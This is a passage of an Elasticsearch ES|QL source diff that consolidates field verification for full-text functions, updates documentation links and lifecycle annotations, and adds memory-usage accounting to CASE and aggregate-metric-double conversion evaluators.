org.elasticsearch.xpack.esql.core.expression.Expression; @@ -393,19 +392,7 @@ public Expression replaceQueryBuilder(QueryBuilder queryBuilder) { public BiConsumer postAnalysisPlanVerification() { return (plan, failures) -> { super.postAnalysisPlanVerification().accept(plan, failures); - plan.forEachExpression(Match.class, m -> { - if (m.fieldAsFieldAttribute() == null) { - failures.add( - Failure.fail( - m.field(), - "[{}] {} cannot operate on [{}], which is not a field from an index mapping", - functionName(), - functionType(), - m.field().sourceText() - ) - ); - } - }); + fieldVerifier(plan, this, field, failures); }; } diff --git a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/fulltext/MatchPhrase.java b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/fulltext/MatchPhrase.java index 134096460a3d7..f3798a6ebf463 100644 --- a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/fulltext/MatchPhrase.java +++ b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/fulltext/MatchPhrase.java @@ -13,7 +13,6 @@ import org.elasticsearch.common.io.stream.StreamOutput; import org.elasticsearch.index.query.QueryBuilder; import org.elasticsearch.xpack.esql.capabilities.PostAnalysisPlanVerificationAware; -import org.elasticsearch.xpack.esql.common.Failure; import org.elasticsearch.xpack.esql.common.Failures; import org.elasticsearch.xpack.esql.core.InvalidArgumentException; import org.elasticsearch.xpack.esql.core.expression.Expression; @@ -60,10 +59,8 @@ import static org.elasticsearch.xpack.esql.core.type.DataType.DATE_NANOS; import static org.elasticsearch.xpack.esql.core.type.DataType.FLOAT; import static org.elasticsearch.xpack.esql.core.type.DataType.INTEGER; -import static org.elasticsearch.xpack.esql.core.type.DataType.IP; import static org.elasticsearch.xpack.esql.core.type.DataType.KEYWORD; import static org.elasticsearch.xpack.esql.core.type.DataType.TEXT; -import static org.elasticsearch.xpack.esql.core.type.DataType.VERSION; /** * Full text function that performs a {@link org.elasticsearch.xpack.esql.querydsl.query.MatchPhraseQuery} . @@ -92,9 +89,7 @@ public class MatchPhrase extends FullTextFunction implements OptionalArgument, P @FunctionInfo( returnType = "boolean", - appliesTo = { - @FunctionAppliesTo(lifeCycle = FunctionAppliesToLifecycle.UNAVAILABLE, version = "9.0"), - @FunctionAppliesTo(lifeCycle = FunctionAppliesToLifecycle.GA, version = "9.1.0") }, + appliesTo = { @FunctionAppliesTo(lifeCycle = FunctionAppliesToLifecycle.GA, version = "9.1.0") }, description = """ Use `MATCH_PHRASE` to perform a [`match_phrase`](/reference/query-languages/query-dsl/query-dsl-match-query-phrase.md) on the specified field. @@ -252,19 +247,7 @@ public Expression replaceQueryBuilder(QueryBuilder queryBuilder) { public BiConsumer postAnalysisPlanVerification() { return (plan, failures) -> { super.postAnalysisPlanVerification().accept(plan, failures); - plan.forEachExpression(MatchPhrase.class, mp -> { - if (mp.fieldAsFieldAttribute() == null) { - failures.add( - Failure.fail( - mp.field(), - "[{}] {} cannot operate on [{}], which is not a field from an index mapping", - functionName(), - functionType(), - mp.field().sourceText() - ) - ); - } - }); + FullTextFunction.fieldVerifier(plan, this, field, failures); }; } diff --git a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/fulltext/Term.java b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/fulltext/Term.java index 94de3d33251d8..76188dc146ee6 100644 --- a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/fulltext/Term.java +++ b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/fulltext/Term.java @@ -13,7 +13,6 @@ import org.elasticsearch.common.io.stream.StreamOutput; import org.elasticsearch.index.query.QueryBuilder; import org.elasticsearch.xpack.esql.capabilities.PostAnalysisPlanVerificationAware; -import org.elasticsearch.xpack.esql.common.Failure; import org.elasticsearch.xpack.esql.common.Failures; import org.elasticsearch.xpack.esql.core.expression.Expression; import org.elasticsearch.xpack.esql.core.expression.FieldAttribute; @@ -112,19 +111,7 @@ private TypeResolution resolveField() { public BiConsumer postAnalysisPlanVerification() { return (plan, failures) -> { super.postAnalysisPlanVerification().accept(plan, failures); - plan.forEachExpression(Term.class, t -> { - if (t.field() instanceof FieldAttribute == false) { // TODO: is a conversion possible, similar to Match’s case? - failures.add( - Failure.fail( - t.field(), - "[{}] {} cannot operate on [{}], which is not a field from an index mapping", - t.functionName(), - t.functionType(), - t.field().sourceText() - ) - ); - } - }); + fieldVerifier(plan, this, field, failures); }; } @@ -157,6 +144,7 @@ public Expression field() { return field; } + // TODO: method can be dropped, to allow failure messages contain the capitalized function name, aligned with similar functions/classes @Override public String functionName() { return ENTRY.name; diff --git a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/grouping/Bucket.java b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/grouping/Bucket.java index bb6633686fc7c..9b3cf7d2f683f 100644 --- a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/grouping/Bucket.java +++ b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/grouping/Bucket.java @@ -135,7 +135,7 @@ another in which the bucket size is provided directly (two parameters). ::::{note} `BUCKET` does not filter any rows. It only uses the provided range to pick a good bucket size. For rows with a value outside of the range, it returns a bucket value that corresponds to a bucket outside the range. - Combine `BUCKET` with <> to filter rows. + Combine `BUCKET` with [`WHERE`](/reference/query-languages/esql/commands/where.md) to filter rows. ::::""" ), @Example(description = """ @@ -169,7 +169,7 @@ another in which the bucket size is provided directly (two parameters). @Example( description = """ `BUCKET` may be used in both the aggregating and grouping part of the - <> command provided that in the aggregating + [STATS ... BY ...](/reference/query-languages/esql/commands/stats-by.md) command provided that in the aggregating part the function is referenced by an alias defined in the grouping part, or that it is invoked with the exact same expression:""", file = "bucket", diff --git a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/grouping/Categorize.java b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/grouping/Categorize.java index 81ac52cad151d..570410c7a11c2 100644 --- a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/grouping/Categorize.java +++ b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/grouping/Categorize.java @@ -18,6 +18,8 @@ import org.elasticsearch.xpack.esql.core.tree.Source; import org.elasticsearch.xpack.esql.core.type.DataType; import org.elasticsearch.xpack.esql.expression.function.Example; +import org.elasticsearch.xpack.esql.expression.function.FunctionAppliesTo; +import org.elasticsearch.xpack.esql.expression.function.FunctionAppliesToLifecycle; import org.elasticsearch.xpack.esql.expression.function.FunctionInfo; import org.elasticsearch.xpack.esql.expression.function.FunctionType; import org.elasticsearch.xpack.esql.expression.function.Param; @@ -63,7 +65,10 @@ public class Categorize extends GroupingFunction.NonEvaluatableGroupingFunction tag = "docsCategorize", description = "This example categorizes server logs messages into categories and aggregates their counts. " ) }, - type = FunctionType.GROUPING + type = FunctionType.GROUPING, + appliesTo = { + @FunctionAppliesTo(lifeCycle = FunctionAppliesToLifecycle.PREVIEW, version = "9.0"), + @FunctionAppliesTo(lifeCycle = FunctionAppliesToLifecycle.GA, version = "9.1") } ) public Categorize( Source source, diff --git a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/scalar/conditional/Case.java b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/scalar/conditional/Case.java index fff1189207cc7..64c176abd9c2c 100644 --- a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/scalar/conditional/Case.java +++ b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/scalar/conditional/Case.java @@ -7,6 +7,7 @@ package org.elasticsearch.xpack.esql.expression.function.scalar.conditional; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.common.io.stream.NamedWriteableRegistry; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; @@ -364,6 +365,9 @@ record ConditionEvaluator( EvalOperator.ExpressionEvaluator condition, EvalOperator.ExpressionEvaluator value ) implements Releasable { + + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(CaseLazyEvaluator.class); + @Override public void close() { Releasables.closeExpectNoException(condition, value); @@ -377,6 +381,10 @@ public String toString() { public void registerMultivalue() { conditionWarnings.registerException(new IllegalArgumentException("CASE expects a single-valued boolean")); } + + public long baseRamBytesUsed() { + return BASE_RAM_BYTES_USED + condition.baseRamBytesUsed() + value.baseRamBytesUsed(); + } } private record CaseLazyEvaluatorFactory( @@ -414,6 +422,9 @@ private record CaseLazyEvaluator( List conditions, EvalOperator.ExpressionEvaluator elseVal ) implements EvalOperator.ExpressionEvaluator { + + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(CaseLazyEvaluator.class); + @Override public Block eval(Page page) { /* @@ -461,6 +472,16 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + for (ConditionEvaluator condition : conditions) { + baseRamBytesUsed += condition.baseRamBytesUsed(); + } + baseRamBytesUsed += elseVal.baseRamBytesUsed(); + return baseRamBytesUsed; + } + @Override public void close() { Releasables.closeExpectNoException(() -> Releasables.close(conditions), elseVal); @@ -504,6 +525,9 @@ private record CaseEagerEvaluator( ConditionEvaluator condition, EvalOperator.ExpressionEvaluator elseVal ) implements EvalOperator.ExpressionEvaluator { + + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(CaseLazyEvaluator.class); + @Override public Block eval(Page page) { try (BooleanBlock lhsOrRhsBlock = (BooleanBlock) condition.condition.eval(page); ToMask lhsOrRhs = lhsOrRhsBlock.toMask()) { @@ -542,6 +566,11 @@ public void close() { Releasables.closeExpectNoException(condition, elseVal); } + @Override + public long baseRamBytesUsed() { + return BASE_RAM_BYTES_USED + condition.baseRamBytesUsed() + elseVal.baseRamBytesUsed(); + } + @Override public String toString() { return "CaseEagerEvaluator[conditions=[" + condition + "], elseVal=" + elseVal + ']'; diff --git a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/scalar/convert/FromAggregateMetricDouble.java b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/scalar/convert/FromAggregateMetricDouble.java index 61129df973a55..977c52de3c819 100644 --- a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/scalar/convert/FromAggregateMetricDouble.java +++ b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/scalar/convert/FromAggregateMetricDouble.java @@ -7,12 +7,14 @@ package org.elasticsearch.xpack.esql.expression.function.scalar.convert; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.common.io.stream.NamedWriteableRegistry; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; import org.elasticsearch.compute.data.AggregateMetricDoubleBlock; import org.elasticsearch.compute.data.AggregateMetricDoubleBlockBuilder; import org.elasticsearch.compute.data.Block; +import org.elasticsearch.compute.data.BlockFactory; import org.elasticsearch.compute.data.Page; import org.elasticsearch.compute.operator.DriverContext; import org.elasticsearch.compute.operator.EvalOperator; @@ -136,37 +138,46 @@ public String toString() { @Override public EvalOperator.ExpressionEvaluator get(DriverContext context) { final EvalOperator.ExpressionEvaluator eval = fieldEvaluator.get(context); + final int subFieldIndex = ((Number) subfieldIndex.fold(FoldContext.small())).intValue(); + return new Evaluator(context.blockFactory(), eval, subFieldIndex); + } + }; + } + + private record Evaluator(BlockFactory blockFactory, EvalOperator.ExpressionEvaluator eval, int subFieldIndex) + implements + EvalOperator.ExpressionEvaluator { - return new EvalOperator.ExpressionEvaluator() { - @Override - public Block eval(Page page) { - Block block = eval.eval(page); - if (block.areAllValuesNull()) { - return block; - } - try { - Block resultBlock = ((AggregateMetricDoubleBlock) block).getMetricBlock( - ((Number) subfieldIndex.fold(FoldContext.small())).intValue() - ); - resultBlock.incRef(); - return resultBlock; - } finally { - block.close(); - } - } - - @Override - public void close() { - Releasables.closeExpectNoException(eval); - } - - @Override - public String toString() { - return "FromAggregateMetricDoubleEvaluator[field=" + eval + ",subfieldIndex=" + subfieldIndex + "]"; - } - }; + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(Evaluator.class); + @Override + public Block eval(Page page) { + Block block = eval.eval(page); + if (block.areAllValuesNull()) { + return block; } - }; + try { + Block resultBlock = ((AggregateMetricDoubleBlock) block).getMetricBlock(subFieldIndex); + resultBlock.incRef(); + return resultBlock; + } finally { + block.close(); + } + } + + @Override + public long baseRamBytesUsed() { + return BASE_RAM_BYTES_USED + eval.baseRamBytesUsed(); + } + + @Override + public void close() { + Releasables.closeExpectNoException(eval); + } + + @Override + public String toString() { + return "FromAggregateMetricDoubleEvaluator[field=" + eval + ",subfieldIndex=" + subFieldIndex + "]"; + } } } diff --git a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToAggregateMetricDouble.java b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToAggregateMetricDouble.java index 87a4492f33094..d1c404f5025af 100644 --- a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToAggregateMetricDouble.java +++ b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToAggregateMetricDouble.java @@ -7,8 +7,10 @@ package org.elasticsearch.xpack.esql.expression.function.scalar.convert; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.common.io.stream.NamedWriteableRegistry; import org.elasticsearch.common.io.stream.StreamInput; +import org.elasticsearch.compute.data.AggregateMetricDoubleArrayBlock; import org.elasticsearch.compute.data.AggregateMetricDoubleBlock; import org.elasticsearch.compute.data.AggregateMetricDoubleBlockBuilder; import org.elasticsearch.compute.data.Block; @@ -53,10 +55,10 @@ public class ToAggregateMetricDouble extends AbstractConvertFunction { private static final Map EVALUATORS = Map.ofEntries( Map.entry(AGGREGATE_METRIC_DOUBLE, (source, fieldEval) -> fieldEval), - Map.entry(DOUBLE, DoubleFactory::new), - Map.entry(INTEGER, IntFactory::new), - Map.entry(LONG, LongFactory::new), - Map.entry(UNSIGNED_LONG, UnsignedLongFactory::new) + Map.entry(DOUBLE, (source, fieldEval) -> new DoubleFactory(fieldEval)), + Map.entry(INTEGER, (source, fieldEval) -> new IntFactory(fieldEval)), + Map.entry(LONG, (source, fieldEval) -> new LongFactory(fieldEval)), + Map.entry(UNSIGNED_LONG, (source, fieldEval) -> new UnsignedLongFactory(fieldEval)) ); public static final NamedWriteableRegistry.Entry ENTRY = new NamedWriteableRegistry.Entry( @@ -147,7 +149,12 @@ private Block build() { try { doubleBlock = valuesBuilder.build().asBlock(); countBlock = blockFactory.newConstantIntBlockWith(1, doubleBlock.getPositionCount()); - AggregateMetricDoubleBlock aggBlock = new AggregateMetricDoubleBlock(doubleBlock, doubleBlock, doubleBlock, countBlock); + AggregateMetricDoubleBlock aggBlock = new AggregateMetricDoubleArrayBlock( + doubleBlock, + doubleBlock, + doubleBlock, + countBlock + ); doubleBlock.incRef(); doubleBlock.incRef(); success = true; @@ -166,13 +173,10 @@ public void close() { } public static class DoubleFactory implements EvalOperator.ExpressionEvaluator.Factory { - private final Source source; - private final EvalOperator.ExpressionEvaluator.Factory fieldEvaluator; - public DoubleFactory(Source source, EvalOperator.ExpressionEvaluator.Factory fieldEvaluator) { + public DoubleFactory(EvalOperator.ExpressionEvaluator.Factory fieldEvaluator) { this.fieldEvaluator = fieldEvaluator; - this.source = source; } @Override @@ -182,97 +186,95 @@ public String toString() { @Override public EvalOperator.ExpressionEvaluator get(DriverContext context) { - final EvalOperator.ExpressionEvaluator eval = fieldEvaluator.get(context); - - return new EvalOperator.ExpressionEvaluator() { - private Block evalBlock(Block block) { - int positionCount = block.getPositionCount(); - DoubleBlock doubleBlock = (DoubleBlock) block; - try ( - AggregateMetricDoubleBlockBuilder builder = context.blockFactory() - .newAggregateMetricDoubleBlockBuilder(positionCount) - ) { - CompensatedSum compensatedSum = new CompensatedSum(); - for (int p = 0; p < positionCount; p++) { - int valueCount = doubleBlock.getValueCount(p); - if (valueCount == 0) { - builder.appendNull(); - continue; - } - int start = doubleBlock.getFirstValueIndex(p); - int end = start + valueCount; - if (valueCount == 1) { - double current = doubleBlock.getDouble(start); - builder.min().appendDouble(current); - builder.max().appendDouble(current); - builder.sum().appendDouble(current); - builder.count().appendInt(valueCount); - continue; - } - double min = Double.POSITIVE_INFINITY; - double max = Double.NEGATIVE_INFINITY; - for (int i = start; i < end; i++) { - double current = doubleBlock.getDouble(i); - min = Math.min(min, current); - max = Math.max(max, current); - compensatedSum.add(current); - } - builder.min().appendDouble(min); - builder.max().appendDouble(max); - builder.sum().appendDouble(compensatedSum.value()); - builder.count().appendInt(valueCount); - compensatedSum.reset(0, 0); - } - return builder.build(); - } - } + return new DoubleEvaluator(context.blockFactory(), fieldEvaluator.get(context)); + } + } - private Block evalVector(Vector vector) { - int positionCount = vector.getPositionCount(); - DoubleVector doubleVector = (DoubleVector) vector; - try ( - AggregateMetricDoubleVectorBuilder builder = new AggregateMetricDoubleVectorBuilder( - positionCount, - context.blockFactory() - ) - ) { - for (int p = 0; p < positionCount; p++) { - double value = doubleVector.getDouble(p); - builder.appendValue(value); - } - return builder.build(); + public record DoubleEvaluator(BlockFactory blockFactory, EvalOperator.ExpressionEvaluator eval) + implements + EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(DoubleEvaluator.class); + + private Block evalBlock(Block block) { + int positionCount = block.getPositionCount(); + DoubleBlock doubleBlock = (DoubleBlock) block; + try (AggregateMetricDoubleBlockBuilder builder = blockFactory.newAggregateMetricDoubleBlockBuilder(positionCount)) { + CompensatedSum compensatedSum = new CompensatedSum(); + for (int p = 0; p < positionCount; p++) { + int valueCount = doubleBlock.getValueCount(p); + if (valueCount == 0) { + builder.appendNull(); + continue; } - } - - @Override - public Block eval(Page page) { - try (Block block = eval.eval(page)) { - Vector vector = block.asVector(); - return vector == null ? evalBlock(block) : evalVector(vector); + int start = doubleBlock.getFirstValueIndex(p); + int end = start + valueCount; + if (valueCount == 1) { + double current = doubleBlock.getDouble(start); + builder.min().appendDouble(current); + builder.max().appendDouble(current); + builder.sum().appendDouble(current); + builder.count().appendInt(valueCount); + continue; } + double min = Double.POSITIVE_INFINITY; + double max = Double.NEGATIVE_INFINITY; + for (int i = start; i < end; i++) { + double current = doubleBlock.getDouble(i); + min = Math.min(min, current); + max = Math.max(max, current); + compensatedSum.add(current); + } + builder.min().appendDouble(min); + builder.max().appendDouble(max); + builder.sum().appendDouble(compensatedSum.value()); + builder.count().appendInt(valueCount); + compensatedSum.reset(0, 0); } + return builder.build(); + } + } - @Override - public void close() { - Releasables.closeExpectNoException(eval); + private Block evalVector(Vector vector) { + int positionCount = vector.getPositionCount(); + DoubleVector doubleVector = (DoubleVector) vector; + try (AggregateMetricDoubleVectorBuilder builder = new AggregateMetricDoubleVectorBuilder(positionCount, blockFactory)) { + for (int p = 0; p < positionCount; p++) { + double value = doubleVector.getDouble(p); + builder.appendValue(value); } + return builder.build(); + } + } - @Override - public String toString() { - return "ToAggregateMetricDoubleFromDoubleEvaluator[field=" + eval + "]"; - } - }; + @Override + public Block eval(Page page) { + try (Block block = eval.eval(page)) { + Vector vector = block.asVector(); + return vector == null ? evalBlock(block) : evalVector(vector); + } + } + + @Override + public void close() { + Releasables.closeExpectNoException(eval); + } + + @Override + public long baseRamBytesUsed() { + return BASE_RAM_BYTES_USED + eval.baseRamBytesUsed(); + } + + @Override + public String toString() { + return "ToAggregateMetricDoubleFromDoubleEvaluator[field=" + eval + "]"; } } public static class IntFactory implements EvalOperator.ExpressionEvaluator.Factory { - private final Source source; - private final EvalOperator.ExpressionEvaluator.Factory fieldEvaluator; - public IntFactory(Source source, EvalOperator.ExpressionEvaluator.Factory fieldEvaluator) { + public IntFactory(EvalOperator.ExpressionEvaluator.Factory fieldEvaluator) { this.fieldEvaluator = fieldEvaluator; - this.source = source; } @Override @@ -282,97 +284,95 @@ public String toString() { @Override public EvalOperator.ExpressionEvaluator get(DriverContext context) { - final EvalOperator.ExpressionEvaluator eval = fieldEvaluator.get(context); - - return new EvalOperator.ExpressionEvaluator() { - @Override - public Block eval(Page page) { - try (Block block = eval.eval(page)) { - Vector vector = block.asVector(); - return vector == null ? evalBlock(block) : evalVector(vector); - } - } + return new IntEvaluator(context.blockFactory(), fieldEvaluator.get(context)); + } + } - private Block evalBlock(Block block) { - int positionCount = block.getPositionCount(); - IntBlock intBlock = (IntBlock) block; - try ( - AggregateMetricDoubleBlockBuilder builder = context.blockFactory() - .newAggregateMetricDoubleBlockBuilder(positionCount) - ) { - CompensatedSum sum = new CompensatedSum(); - for (int p = 0; p < positionCount; p++) { - int valueCount = intBlock.getValueCount(p); - int start = intBlock.getFirstValueIndex(p); - int end = start + valueCount; - if (valueCount == 0) { - builder.appendNull(); - continue; - } - if (valueCount == 1) { - double current = intBlock.getInt(start); - builder.min().appendDouble(current); - builder.max().appendDouble(current); - builder.sum().appendDouble(current); - builder.count().appendInt(valueCount); - continue; - } - double min = Double.POSITIVE_INFINITY; - double max = Double.NEGATIVE_INFINITY; - for (int i = start; i < end; i++) { - double current = intBlock.getInt(i); - min = Math.min(min, current); - max = Math.max(max, current); - sum.add(current); - } - builder.min().appendDouble(min); - builder.max().appendDouble(max); - builder.sum().appendDouble(sum.value()); - builder.count().appendInt(valueCount); - sum.reset(0, 0); - } - return builder.build(); - } - } + public record IntEvaluator(BlockFactory blockFactory, EvalOperator.ExpressionEvaluator eval) + implements + EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(IntEvaluator.class); - private Block evalVector(Vector vector) { - int positionCount = vector.getPositionCount(); - IntVector intVector = (IntVector) vector; - try ( - AggregateMetricDoubleVectorBuilder builder = new AggregateMetricDoubleVectorBuilder( - positionCount, - context.blockFactory() - ) - ) { - for (int p = 0; p < positionCount; p++) { - double value = intVector.getInt(p); - builder.appendValue(value); - } - return builder.build(); + @Override + public Block eval(Page page) { + try (Block block = eval.eval(page)) { + Vector vector = block.asVector(); + return vector == null ? evalBlock(block) : evalVector(vector); + } + } + + private Block evalBlock(Block block) { + int positionCount = block.getPositionCount(); + IntBlock intBlock = (IntBlock) block; + try (AggregateMetricDoubleBlockBuilder builder = blockFactory.newAggregateMetricDoubleBlockBuilder(positionCount)) { + CompensatedSum sum = new CompensatedSum(); + for (int p = 0; p < positionCount; p++) { + int valueCount = intBlock.getValueCount(p); + int start = intBlock.getFirstValueIndex(p); + int end = start + valueCount; + if (valueCount == 0) { + builder.appendNull(); + continue; } + if (valueCount == 1) { + double current = intBlock.getInt(start); + builder.min().appendDouble(current); + builder.max().appendDouble(current); + builder.sum().appendDouble(current); + builder.count().appendInt(valueCount); + continue; + } + double min = Double.POSITIVE_INFINITY; + double max = Double.NEGATIVE_INFINITY; + for (int i = start; i < end; i++) { + double current = intBlock.getInt(i); + min = Math.min(min, current); + max = Math.max(max, current); + sum.add(current); + } + builder.min().appendDouble(min); + builder.max().appendDouble(max); + builder.sum().appendDouble(sum.value()); + builder.count().appendInt(valueCount); + sum.reset(0, 0); } + return builder.build(); + } + } - @Override - public void close() { - Releasables.closeExpectNoException(eval); + private Block evalVector(Vector vector) { + int positionCount = vector.getPositionCount(); + IntVector intVector = (IntVector) vector; + try (AggregateMetricDoubleVectorBuilder builder = new AggregateMetricDoubleVectorBuilder(positionCount, blockFactory)) { + for (int p = 0; p < positionCount; p++) { + double value = intVector.getInt(p); + builder.appendValue(value); } + return builder.build(); + } + } - @Override - public String toString() { - return "ToAggregateMetricDoubleFromIntEvaluator[field=" + eval + "]"; - } - }; + @Override + public long baseRamBytesUsed() { + return BASE_RAM_BYTES_USED + eval.baseRamBytesUsed(); + } + + @Override + public void close() { + Releasables.closeExpectNoException(eval); + } + + @Override + public String toString() { + return "ToAggregateMetricDoubleFromIntEvaluator[field=" + eval + "]"; } } public static class LongFactory implements EvalOperator.ExpressionEvaluator.Factory { - private final Source source; - private final EvalOperator.ExpressionEvaluator.Factory fieldEvaluator; - public LongFactory(Source source, EvalOperator.ExpressionEvaluator.Factory fieldEvaluator) { + public LongFactory(EvalOperator.ExpressionEvaluator.Factory fieldEvaluator) { this.fieldEvaluator = fieldEvaluator; - this.source = source; } @Override @@ -382,97 +382,95 @@ public String toString() { @Override public EvalOperator.ExpressionEvaluator get(DriverContext context) { - final EvalOperator.ExpressionEvaluator eval = fieldEvaluator.get(context); - - return new EvalOperator.ExpressionEvaluator() { - private Block evalBlock(Block block) { - int positionCount = block.getPositionCount(); - LongBlock longBlock = (LongBlock) block; - try ( - AggregateMetricDoubleBlockBuilder builder = context.blockFactory() - .newAggregateMetricDoubleBlockBuilder(positionCount) - ) { - CompensatedSum sum = new CompensatedSum(); - for (int p = 0; p < positionCount; p++) { - int valueCount = longBlock.getValueCount(p); - int start = longBlock.getFirstValueIndex(p); - int end = start + valueCount; - if (valueCount == 0) { - builder.appendNull(); - continue; - } - if (valueCount == 1) { - double current = longBlock.getLong(start); - builder.min().appendDouble(current); - builder.max().appendDouble(current); - builder.sum().appendDouble(current); - builder.count().appendInt(valueCount); - continue; - } - double min = Double.POSITIVE_INFINITY; - double max = Double.NEGATIVE_INFINITY; - for (int i = start; i < end; i++) { - double current = longBlock.getLong(i); - min = Math.min(min, current); - max = Math.max(max, current); - sum.add(current); - } - builder.min().appendDouble(min); - builder.max().appendDouble(max); - builder.sum().appendDouble(sum.value()); - builder.count().appendInt(valueCount); - sum.reset(0, 0); - } - return builder.build(); - } - } + return new LongEvaluator(context.blockFactory(), fieldEvaluator.get(context)); + } + } - private Block evalVector(Vector vector) { - int positionCount = vector.getPositionCount(); - LongVector longVector = (LongVector) vector; - try ( - AggregateMetricDoubleVectorBuilder builder = new AggregateMetricDoubleVectorBuilder( - positionCount, - context.blockFactory() - ) - ) { - for (int p = 0; p < positionCount; p++) { - double value = longVector.getLong(p); - builder.appendValue(value); - } - return builder.build(); + public record LongEvaluator(BlockFactory blockFactory, EvalOperator.ExpressionEvaluator eval) + implements + EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(LongEvaluator.class); + + private Block evalBlock(Block block) { + int positionCount = block.getPositionCount(); + LongBlock longBlock = (LongBlock) block; + try (AggregateMetricDoubleBlockBuilder builder = blockFactory.newAggregateMetricDoubleBlockBuilder(positionCount)) { + CompensatedSum sum = new CompensatedSum(); + for (int p = 0; p < positionCount; p++) { + int valueCount = longBlock.getValueCount(p); + int start = longBlock.getFirstValueIndex(p); + int end = start + valueCount; + if (valueCount == 0) { + builder.appendNull(); + continue; } - } - - @Override - public Block eval(Page page) { - try (Block block = eval.eval(page)) { - Vector vector = block.asVector(); - return vector == null ? evalBlock(block) : evalVector(vector); + if (valueCount == 1) { + double current = longBlock.getLong(start); + builder.min().appendDouble(current); + builder.max().appendDouble(current); + builder.sum().appendDouble(current); + builder.count().appendInt(valueCount); + continue; } + double min = Double.POSITIVE_INFINITY; + double max = Double.NEGATIVE_INFINITY; + for (int i = start; i < end; i++) { + double current = longBlock.getLong(i); + min = Math.min(min, current); + max = Math.max(max, current); + sum.add(current); + } + builder.min().appendDouble(min); + builder.max().appendDouble(max); + builder.sum().appendDouble(sum.value()); + builder.count().appendInt(valueCount); + sum.reset(0, 0); } + return builder.build(); + } + } - @Override - public void close() { - Releasables.closeExpectNoException(eval); + private Block evalVector(Vector vector) { + int positionCount = vector.getPositionCount(); + LongVector longVector = (LongVector) vector; + try (AggregateMetricDoubleVectorBuilder builder = new AggregateMetricDoubleVectorBuilder(positionCount, blockFactory)) { + for (int p = 0; p < positionCount; p++) { + double value = longVector.getLong(p); + builder.appendValue(value); } + return builder.build(); + } + } - @Override - public String toString() { - return "ToAggregateMetricDoubleFromLongEvaluator[field=" + eval + "]"; - } - }; + @Override + public Block eval(Page page) { + try (Block block = eval.eval(page)) { + Vector vector = block.asVector(); + return vector == null ? evalBlock(block) : evalVector(vector); + } + } + + @Override + public long baseRamBytesUsed() { + return BASE_RAM_BYTES_USED + eval.baseRamBytesUsed(); + } + + @Override + public void close() { + Releasables.closeExpectNoException(eval); + } + + @Override + public String toString() { + return "ToAggregateMetricDoubleFromLongEvaluator[field=" + eval + "]"; } } public static class UnsignedLongFactory implements EvalOperator.ExpressionEvaluator.Factory { - private final Source source; - private final EvalOperator.ExpressionEvaluator.Factory fieldEvaluator; - public UnsignedLongFactory(Source source, EvalOperator.ExpressionEvaluator.Factory fieldEvaluator) { + public UnsignedLongFactory(EvalOperator.ExpressionEvaluator.Factory fieldEvaluator) { this.fieldEvaluator = fieldEvaluator; - this.source = source; } @Override @@ -482,86 +480,87 @@ public String toString() { @Override public EvalOperator.ExpressionEvaluator get(DriverContext context) { - final EvalOperator.ExpressionEvaluator eval = fieldEvaluator.get(context); - - return new EvalOperator.ExpressionEvaluator() { - private Block evalBlock(Block block) { - int positionCount = block.getPositionCount(); - LongBlock longBlock = (LongBlock) block; - try ( - AggregateMetricDoubleBlockBuilder builder = context.blockFactory() - .newAggregateMetricDoubleBlockBuilder(positionCount) - ) { - CompensatedSum sum = new CompensatedSum(); - for (int p = 0; p < positionCount; p++) { - int valueCount = longBlock.getValueCount(p); - int start = 